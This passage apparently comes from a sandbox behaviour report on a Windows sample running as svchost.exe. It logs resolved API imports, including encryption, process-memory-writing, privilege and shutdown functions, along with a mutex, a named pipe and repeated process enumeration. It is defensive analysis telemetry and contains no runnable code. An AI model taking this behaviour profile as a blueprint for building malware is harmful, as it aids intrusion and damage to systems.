| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75a1d4f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75a01986 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x75a04407 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x75a0111e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77292270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75a04950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x75a1ecbb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a844cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75a01856 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75a04173 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x772922b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75a01b18 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x75a015d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75a1d4dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75a04a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x75a1d9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x75a059e2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75a01462 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75a1c860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75a04259 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x75a034c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75a034b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75a01222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x75a0492b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75a28baf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75a2896c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75a2735f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75a03f5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75a0424c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x75a016dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x75a016c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x75a0183e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75a01136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75a04220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75a0110c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75a0186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x757b49ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x757b8deb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x757afbd1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x757b1218 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x772a25dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x757a8a29 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x757a9f84 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x757b2e69 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x757b3e75 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75801a26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x757a7809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x757b05ba |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x757a787b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x757ab17d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x757b6110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x757ad156 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x757af350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x758d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x758dd718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x756f469d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x756f45f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7570779b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x756f0e0c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x756f40e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x756f0e24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x756f2a66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x756f40fe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x756ec54a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x756e9fe2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x756ef4fd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x756edf4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x756edf36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x756f4680 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x756f14d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x756edf66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x756f4304 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x756f412e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x756f4620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x756f468d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x756ec532 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x756f432c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x756f46ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x756ee124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x756f431c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x756ec51a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x756f418e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x756f415e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x756f4608 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x756f41b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x756f413b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x756ecf31 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7570773f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x756ee15b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x756f46e7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x756f445b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7573db3a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x756edf14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75c63c71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75c71e46 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75cd5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x750e45bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x750e55bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x7510cd81 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x750e4745 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7510d32a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x750e46e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x750e86f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x750ec39c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x750e3248 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x750ec177 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x7511066c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x750e5331 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x750ffbf5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x750ea1b9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x750dfcca |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x750fedfe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x750dff07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x750e5c62 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x750fc6fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x7510ce21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x74eb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x74eb13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x7546e599 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x754909ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7547363b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75465ea5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75499d0b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x754986d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75145689 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75144de0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7514e743 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x751454f4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75144f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75145f49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75145ea6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x751458b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753749e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7536b406 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x7536a33e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75361b56 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75374c7d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x7535d075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753675e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x7537f18e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7536ab49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x753e18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76c40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x76c71d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b63eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x748e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x74dea415 |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = E58EFF540968A436E982FCFA1C0445A2 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create Pipe | pipe_name = \device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x7728fda0 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
